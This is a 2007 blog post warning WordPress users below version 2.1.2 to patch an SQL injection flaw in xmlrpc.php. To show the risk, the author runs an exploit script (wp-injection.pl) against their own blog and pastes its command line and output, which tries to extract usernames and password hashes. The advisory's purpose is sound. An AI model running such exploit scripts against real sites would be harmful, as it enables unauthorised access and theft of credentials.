takizo, not takezo

If you are running WordPress below version 2.1.2, patch it immediately, it leads to SQL Injection Vulnerabilities. Here is my test before patch.

wp-injection.pl http://www.takizo.com/blog/xmlrpc.php xxxxx xxxxx 10

The usage is correct
[*] Trying Host http://www.takizo.com/blog/xmlrpc.php ...
[+] The xmlrpc server seems to be working
--------------------
Username for id = 1 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al
--------------------
Username for id = 2 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al

Of course there are more I didn’t show la, just patch it! If you are lazy, this fellow can help you do it for free.

Related posts:

1. PECL Manual Install on Linux Centos Just bought a VPS server hosting to play around from...
2. Downgrade package in Debian   For some reason, the recent Icedove (aka Thunderbird) version...
3. Disable Vulnerabilities Check in FreeBSD Portupgrade After perform FreeBSD portsnap, there are updates for PHP52 packages,...
4. Force Email Delivery on Exim Hundred emails are queuing on your mail relay server, and...
5. Top 20 Favorite Free WordPress Themes One of the coolest stuff of using WordPress is the...

This entry was posted on Friday, April 6th, 2007 at 11:32 pm and is filed under Systems. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.